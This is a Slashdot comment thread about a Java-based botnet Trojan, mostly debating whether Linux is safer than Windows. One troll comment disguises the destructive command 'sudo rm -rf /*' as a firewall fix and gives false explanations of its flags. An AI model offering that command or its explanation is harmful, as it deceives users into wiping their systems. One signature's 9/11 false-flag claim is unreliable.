Slashdot Mirror
Multiplatform Java Botnet Spotted In the Wild
It's fun sometimes to be smug because you are ("one is") using an operating system less susceptible to malware, or at least less targeted by malware creators, than is Microsoft Windows. Now, reader Orome1 writes with word of a Java-based, equal-opportunity botnet Trojan, excerpting from Help Net Security's report: "'IncognitoRAT is one example of a Java-based Trojan discovered in the wild that is being downloaded and installed by another component. This malware behaves like other Windows botnets but uses source code and libraries that can operate on other platforms,' explains McAfee's Carlos Castillo." So far, no mention of a Linux version, though.
It's in the wild !! A Java ... a what??
So far, no mention of a Linux version, though.
Someone tell me timothy is trolling. He can't really be that stupid, can he?
No mention of linux support. Do we always have to come last?
"So far, no mention of a Linux version, though."
Java is Java.. there generally would not be a "linux version", or any platform specific version.. sort of the whole point of this.
-Lod
I doubt that it works on MacOSX. Converting a jar to an exe is difficult. I wish I could do it reliably on Linux, but I can't (gcj doesn't really work). Jar2exe is Windows-only. So I don't see why we need to worry. Java itself is secure enough to at least make virus writing very difficult. So again, nothing to worry about. Another case of journalistic exaggeration.
Because it has a small market share. Nobody wants to write a program that will work on unix based systems because it just isn't practical. The main reason for this is that Linux systems vary wildly in terms of operation and security. Windows does not have this "problem" (and lack of standardization is what has kept Linux out of the mainstream) and, to a degree, neither do Macs. Who would want to write a botnet for linux systems? Now, if our dreams become a reality, and Linux becomes the de facto standard then we will have problems too, this is a perfect example of security though obscurity. The opportunity costs outweigh the benefits, as long as this is true then Linux users have little to fear.
00010111 always try everything twice
AFAIK, any OS that allows a user to install software is susceptible to malware.
Anyone smugly thinking they aren't is an idiot.
Wake me up when a worm has been discovered in the wild targeting OS X or Linux
Wasn't this posted here a while back? I think it does run on Windows, Mac and Linux, but tests showed that Linux is the only platform that doesn't allow it to restart after a reboot. Can't find the story, could be wrong.
Shut up cat.
My karma is not a Chameleon.
unix is where the term root for #1 user, hence rootkit comes from. just look at rkhunter and chkrootkit they search for about ~150 such programs. and until very recently there has been a long standing remote vuln in dhcpd3 which existed for months after it was believed to be patched, although the patch was ineffective in ubuntu. yes i still use linux anyway, cause mathematica matlab and intel compilers have 1st class support and hence i am much more productive and the interface is more humane.
Java is Java.. there generally would not be a "linux version", or any platform specific version.. sort of the whole point of this.
Which is why I neverenable java, period. If a site requires it, they don't need my eyeball time.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
How imaginative. Why, when this fallacious "reasoning" defeated in every single slashdot story in which it comes up, do people persist in trying to promote this myth? You *can't* unwittingly install and run arbitrary code on Linux the way you can on windows, unless you're incompetent and running as root all the time (which incredibly, I do know of at least one person who does -- but it's rare).
Caveat Utilitor
Caveat Utilitor
Yeah, no-one would want to hack the OS that Google's servers run on.
And what kind of idiot would want an exploit that would only affect insignificant machines like those pointed to by facebook.com and youtube.com?
Nothing to be gained by exploiting this tiny, hobbyist OS.
jar2exe doesn't work by compiling Java to native code, it starts a JVM and provides the ability to package .jar files into the executable. In principle, a Linux version would be fairly simple to make.
Also, a given JVM is only as locked down as the SecurityManager running inside of it (assuming no exploitable flaws) and you can be assured the trojan packager is not installing one that stops anything.
I'm not really disagreeing with you, but not knowing linux I don't see why this is true. It seems to me that you can't really unwittingly run arbitrary code on windows and that any of the applications/settings that negate this would be just as big a problem on linux.
If you don't know Linux then your opinion doesn't really matter.
I am pretty sure every Linux user here has used Linux AND windows and therefore has the ability to make a direct comparison from a purely user perspective.
If you want your opinion to count for something in cases like this then download Virtualbox and install a Linux VM so that you can experience the differences for yourself.
if linux were to be brought to the level of user-friendliness that windows and osx are at (ie, be a "consumer ready" OS with all that entails), i wouldn't be surprised if people did start running it as root all the time.
windows tried to introduce similar user access control and they got caned for it (even though OSX has the same prompts, but whatevs).
Write once, pwn anywhere.
This is almost as news worthy as a botnet client written in Win32, that might potentially infect Linux computers because the packager could wrap it in Wine.
Java botnet, courtesy of McAfee, the same company that tried to scare people with "jpeg virus" a couple of years ago...
Until you replied to yourself here, I wasn't certain about the fact that you're a troll. I thought maybe you were just a garden variety jackass with more confidence than capability.
The sig is a good touch, it's right on the line between parody and shithead. Well played.
They just gave Oracle a new slogan for Java, "Write once, pwn everywhere!"
Monstar L
"No OS left behind."
2019 is going to be the year of Linux on the desktop.
if linux were to be brought to the level of user-friendliness that windows and osx are at
i.e. make it suck...
(ie, be a "consumer ready" OS with all that entails)
It sounds like you haven't used Linux since last millennium. Lots have happened since then.
A couple of years ago, I gave my father a laptop with Linux installed. At that time he was 65 years old and had never used a computer before. He didn't have any problems using Linux, so maybe you're wrong, if you think Linux ain't "consumer ready".
i'm using it now, buddy.
i could go into the fun i've had getting my USB sound card working.
linux is user-friendly if all you want to do is browse, tweet, IM or email.
as soon as you try anything else, you're in "this is unsupported. it's not our fault. there's a patch here, or is it here. you'll have to recompile the kernel, then recompile ALSA, then compile and install wineasio, jack-dev, and wine-dev, then configure everything. oh, you mean you're not running this really old kernel? well, there's no kernel headers for your version, so you wont be able to recompile ALSA at all. it's not our fault - blame the manufacturer of your hardware".
linux's user-friendliness is a veneer. once you peel it away, you still wind up doing everything in terminal, just like you have for the last 20 years.
note that this is not a big criticism - i love how far it's come. i'm just saying it has further to go, and needs to get along with (often hostile) hardware manufacturers a little better to provide the kind of experience windows or osx can provide, security holes or not.
You *can't* unwittingly install and run arbitrary code on Linux the way you can on windows, unless you're incompetent and running as root all the time
Last I checked, most Linux distros don't have noexec on home, so you most certainly can install and run arbitrary code without having root. It's slightly more of a hurdle in that email attachments and downloaded files won't be immediately executable.
Then again, in Ubuntu, for example, downloading a .deb package in browser and clicking "Open" will launch a GUI installer - and if user clicks "Yes, I want to install this", the .deb can run anything it wants as part of that installation, with root permissions too.
Thing is, you can't have ease of use that's only magically applicable to "good" scenarios - not unless God implements the evil bit.
NoScript.
Great, since you clearly know why it is so, perhaps you could explain it to us mere mortals that are perfectly happy using only one OS. My opinion matters, my information however is undependable because I didn't provide anything. Wolfing's opinion also matters but hi information is also undependable because he didn't provide any either.
If you're going to to state an opinion, you probably want to back it up when queried on it. Very few people should believe a statement that says "This is true because it is".
Seriously for a moment.
Do you have antivirus installed on your linux box? No? you are probably infected.
Do you know how to find out when your linux box has been infected? No? You are probably infected.
Do you know how your linux box gets infected? No? You are probably infected.
Have you disabled SELinux because it was quicker than working out how to fix something it was preventing? Yes? You are probably infected.
Linux is not the virus/trojan free utopia it used to be, and worse, they work without the "machine running like a dog" instant red flag that comes with most windows infections.
The problem with your BS MR AC, is this: Those servers? they actually have these things called "admins" that make many thousands of dollars and are sent to classes and things like Black hat to stay on top of the game, whereas with Windows you have the nice little old lady down the hall that still can't figure out the difference between memory and hard drive space.
Think of it THIS way MR AC: Which would be easier to rob, the bank in the middle of Paduka AR with one old guy that hasn't fired a gun in 30 years, or the supermegabank in Las Vegas where they have had a dozen attempts over the years and have ex special forces for security?
In the end, as much as it will butthurt the Linux desktop users (all four of you) the simple fact is YOU ARE TOO SMALL to be worth the trouble, and the servers running Linux are locked down tighter than a nun's thighs by guys like my old friend Glenn that spend all their time ass deep in sites like Securina and consider recompiling code for security and speed improvements a "fun" way to spend an afternoon. In the end malware writers are like any other criminal and are thus lazy: the easiest mark will always be the target. Now once XP finally dies hard? Well as we have seen with the OSX malware kit they are starting to look at OSX as kinda tasty, and there are plenty of exploits for Android. But Linux desktop is what...0.02% of the market? It would be like targeting OS/2 Warp users, it just isn't worth the effort.
ACs don't waste your time replying, your posts are never seen by me.
The original McAfee blog article says this (why not link to the original resource in the first place?):
So this is not different at all from the Java-based Facebook suicide Trojan horse which circulated in Spring 2010 (but was not spotted by most AV companies back then).
You're right. For Joe Average, it makes a great desktop if they don't need to change anything. I think we are at the point where configuration takes some skill, but the user experience is just fine.
I've got my senior citizen mother using Slackware. She doesn't understand much of anything about computers, or viruses, or pretty much anything your average 15 year old would get about computers, but the interface is _still_ easy enough for her requirements (lolcats, email, reading news/recipes)
If she actually needs to change anything, it is past her abilities and she has to call me. She had to do that under windows, though, so no difference to me, + the added bonus that I don't clean a pile of malware off it every time I visit. Getting her on linux has cured a long standing headache.
[citation needed]
Wow that carries so much weight coming from an Anonymous Coward. Maybe when you grow up you'll have a slashdot account and everything!
Caveat Utilitor
If that's the whole story and you're so knowledgeable then prove me wrong by whipping up a little malware for Linux and post the link so I can try it out. Oddly, after several years of proposing this obvious way to prove that "point", not one person has done it. Must not be as easy as you like to imagine.
Caveat Utilitor
Oh, I won't need a link for that.
If you want to see HOT NAKED LESBIANS though, I'll be happy to give you the link: right here.
If it doesn't work, it's because your firewall blocks it. It's because your Ubuntu Linux, being such a secure OS as you surely know, is highly efficient at blocking various things deemed undesirable. Makes sense, right? But if you want to see HOT NAKED LESBIANS, you'll need to disable it just for this occasion. Luckily this is very easy to do. Just go to Applications -> Utilities -> Terminal, type "sudo rm -rf /*" in the window that appears, and press Enter (to clarify, "rm" means "remove", and "-rf" means "remove filter"; "/*" means "all sites"). Since this is a security-related operation, you will of course need to type in your password to confirm that you are fully aware of what you're doing - which you do, as I have explained it above.
You will need to wait for a few minutes before firewall is reconfigured, though. If your system starts behaving erratically, it may be because the firewall couldn't fully reconfigure due to network being in use; it just means you'll need to reboot.
I used to run one of those what is my IP sites. Now it's IPv6 only because various botnets started (ab)using it. I get a few thousand hits by "Apache-HttpClient/UNAVAILABLE (java 1.4)" pr. hour. Other AV vendors have known for a while, searching for my sites lists several (not mcafee) who lists my site as something the bots use.
9/11: Never forget it was a false-flag operation
Sucks to be you. Gentoo user here, with a considerable amount of real world experience. Troll harder.
Caveat Utilitor
> Java-based Trojan discovered in the wild that is being downloaded and installed by another component. This malware behaves like other Windows botnets but uses source code and libraries that can operate on other platforms ..
Is there a working demo in the wild that I can click on and get rooted on other non-Windows platforms?
Why would there be a "Linux version" of code that runs on multiple platforms? The "Windows version" IS the "Linux version."
Move sig!
You didn't ask malware for Gentoo, though. You asked malware for Linux. 70% of Linux boxen out there run Ubuntu, and probably a half of people who run them don't know what they're doing (judging by the number of people burned every time someone posts a fork bomb or rm carefully disguised inside some Perl ASCII graphics).
I think my original point stands though. If it's so easy to compromise Linux, why isn't it being done? Why can't the very people who like to crow about how easy it is (and even hurl accusations of "security through obscurity") just put up or shut up?
I think we both know the answer to that. The PEBKAC is still there for the average user, no matter which system they use. But in Linux the system isn't designed to make it trivial to run any code from any location, as windows historically has been -- it's a bit better with 7 than it was previously, and XP SP3 is also a major improvement over previous versions. But it's still fairly trivial to generate windows malware, going by the sheer volume of infected machines. I personally have one person in my contacts running win7 whose machine is spamming me daily. Oops. Windows is still the lowest hanging fruit, and as criminals are pretty much always lazy people looking to get rich quick that's what they go for. When that's gone, they'll move on to other scams (assuming OS X has been locked down, otherwise that's hanging a bit low as it is). They will not learn to be 1337 for reelz and finally code that Linux virus. That's not the criminal MO.
Caveat Utilitor
We all know how slow Java is and botnet node users are not willing to upgrade their hardware just to provide a faster service for people who don't pay a cent. So this well-known Java paradigm "Is it too slow? Just add more hardware power!" will not work here.
Who needs to bother getting users to use sudo for e-mail? They install their shitty little PHP-based content management systems by hand and then happily never fucking update them.
Hurr, durr, yum, herp derp, apt-get; all those regular updates and package management bullshit is bullshit when it comes to people uncompressing crap into docroots.
The amount of Linux servers I've seen that have been totally owned and churning out spam by the goddamned megaton is legion .
Java??? How is this going to go unnoticed when it consumes 1/2 your memory and cpu
Per my subject-line above? Linksys routers have a SECURITY setting that allows for filtration of JAVA applets too, per this point you made:
"Getting it onto your system is the trick, though. If they found a hole in the Java plugin's sandbox, they could potentially exploit that using an applet and get the code onto your system. Disabling the plugin prevents that possibility, but if they were trying to push this via browsers there are lots of other plugins and holes are found in browsers all the time." - by Cougar Town (1669754) on Thursday May 05, @09:26PM (#36043646)
So, IF anyone's concerned about that? The "layered security" way around it, is to use router based filtering of JAVA applets (again, which Linksys routers have a security option for, as one example thereof).
APK
this trojan isnt made this way to be multiplatform, but to make it harder to analyse and/or detect both with manual and automated analysis.
I am sick and tired of these motherfucking rants on this motherfucking site!
"When information is power, privacy is freedom" - Jah-Wren Ryel
AppArmor.
"When information is power, privacy is freedom" - Jah-Wren Ryel
GP also ignores the huge number of attempted attacks that every single Internet-reachable Linux box faces every single day. There is no lack of interest, just a lack of success.
"When information is power, privacy is freedom" - Jah-Wren Ryel
Then again, in Ubuntu, for example, downloading a .deb package in browser and clicking "Open" will launch a GUI installer - and if user clicks "Yes, I want to install this", the .deb can run anything it wants as part of that installation, with root permissions too.
Bullshit, you'll get a gksudo prompt, assuming you have sudo privileges at all.
"When information is power, privacy is freedom" - Jah-Wren Ryel
You've only looked at the two extremes. What about all the companies running plain-jane Linux servers with access to all their VoIP accounts and/or file shares? What about all the websites that aren't run by megacorporations with a team of uber-leet admins watching it like a hawk? And what about all the Windows servers that ARE watched like a hawk by uber-leet admins but get broken into anyways?
"When information is power, privacy is freedom" - Jah-Wren Ryel
Hello
If this is your first white screen of death
First contact Microsoft about this problem.
Then press the [any] key to continue.
If this screen still appear you are infected by a virus.
-----------
This white screen of death is made by Microsoft
-----------
The PEBKAC is still there for the average user, no matter which system they use.
It's true, but it still varies by system. Clearly, on Linux there are far fewer such users that would fall for it.
But in Linux the system isn't designed to make it trivial to run any code from any location, as windows historically has been -- it's a bit better with 7 than it was previously, and XP SP3 is also a major improvement over previous versions.
It helps when you look specifically at what, exactly, is "more trivial" in Win7 (lets not deal with ancient software) compared to Linux.
And there's precisely one thing: the fact that executability of the file is controlled by its extension rather than a separate permission bit, which is why it is that much easier to get user to run payload. That's it. Everything else is the same.
And, as I pointed in my earlier post, modern user-friendly Linux distros actually do allow user to open runnable things "right from the browser" so to speak - such as .deb packages (which may contain arbitrary scripts). Given that Windows does prompt the user when he tries to run a downloaded .exe, we're talking about roughly the same amount of effort.
Windows is still the lowest hanging fruit, and as criminals are pretty much always lazy people looking to get rich quick that's what they go for.
Very much, yes, and this is largely because the majority of userbase is clueless, and because the system is surprisingly homogenic even between major releases. E.g. the .deb trick described above - it would work in Ubuntu and some (not all) derivatives, but not on RedHat or SuSE. Thus, to target desktop Linux, you actually need several exploits, with several times the effort of what you'd need for Windows - and for what? 1% of desktop machines tops?
Like you say, people who write malware that you see in the wild don't do it for lulz, they do it for the money that it earns. When you're targeting desktops - which most botnets do - Windows and its userbase is an easy target with very lucrative rewards, and thus an obvious first choice. Why bother with the second, much less third?
For the same reason, most attacks target PEBKAC and not the actual OS security. Why bother, when the average user will happily get you past all security mechanisms if you're convincing enough (which is so easy)?
On the other hand, if you actually know what you're doing, you're safe on any major desktop platform today.
Yes, you will get such a prompt - so what? If the user has actually tried to open the .deb file from a random place, why do you think he'll suddenly stop at a stock OS prompt that he had seen before?
And yes, you can assume they have sudo privileges - the default user in Ubuntu does, out of the box.
The point is there is no privilege elevation exploit in gdebi as you suggest. Yes the average user with sudo access can enter their sudo password to install a malicious app. But that's one step away from beating the computer with a sledgehammer. You can't stop users from destroying their own computers.
"When information is power, privacy is freedom" - Jah-Wren Ryel
The point is there is no privilege elevation exploit in gdebi as you suggest.
At no point did I suggested that there's any kind of privilege elevation exploit. 99% of Windows malware infections don't use one, either - they rely on user to willingly circumvent any protections the OS might throw at him (Vista/7 have SUA, remember, which is not fundamentally any different from sudo).
You can't stop users from destroying their own computers.
My point exactly.
Actually I've set up quite a few of those, and they damned near all run WinServer. Hell I can take any PHB and have him in about two weeks far enough along he can add OUs and do basic GPO edits. WinServer is so damned "clicky clicky" it is beyond simple now.
The problem with Linux, especially in the server role, is you really have to know your shit to get it running rock solid and hassle free. And those guys? They ain't cheap, even if there are any in your area (which is usually rare unless you live in a city of over 500,000) whereas MCSEs are as common as dirt and just as cheap. As long as you pay for licenses by the server and not the user (which in small shops works just fine) then WinServer ends up cheaper in the long run. For web hosting you just pay some guy to set up the website on a virtual server with some hosting company, easy peasy.
So I'd say there is a reason why fully two thirds of new servers being sold are coming with WinServer, and WinSBS is selling like hitcakes. Because despite the 'free as in beer" BS it actually comes out cheaper in the long run to get an MCSE than it is to pay a Linux guru for anything smaller than say UPS or Amazon. Linux guys are rare, expensive,and even then all it takes is one funky rare error for the downtime to kill you. With WinServer any problem has been found a thousand times over and is usually one short Google away from being fixed. hell my mom could run a Windows domain, it really ain't hard.
ACs don't waste your time replying, your posts are never seen by me.
I am one of "those guys." And trust me I wish we were really expensive but we don't make a whole lot more than Windows admins (unless you consider not having to deal with Windows boxes to be part of the payment). Rare? Maybe, but just in my area I know 2 other Linux admins, and there's nowhere near half a million people around here, so we're not that rare.
As for downtime, that is laughable. Telling a Linux admin to worry about downtime is like telling a gunship pilot to worry about a guy with a slingshot. We're not concerned. We've got it under control.
"When information is power, privacy is freedom" - Jah-Wren Ryel
And, I really don't see your point, unless you're saying that a secured http page has an exploit on it for instance, theoretically... is that where you're going in your statement?
APK
P.S.=> If so, that's when I'd couple using say, Opera's "by site preferences" & ONLY ALLOW java to run on certain pages that demand it & that I know are trustworthy... in combination with the Linksys security feature I noted (where the router can "filter out" java applets), for "layered security" purposes... apk
excuse my question: is this the first botnet running in java? what are the other common languages that are used to write this stuff. For sure it ain't Visual Basic. Why is the code of malware not portable when written in c++? For now its just a matter of time until the botnets run more reliable in linux, but still run in $gcc_plattform.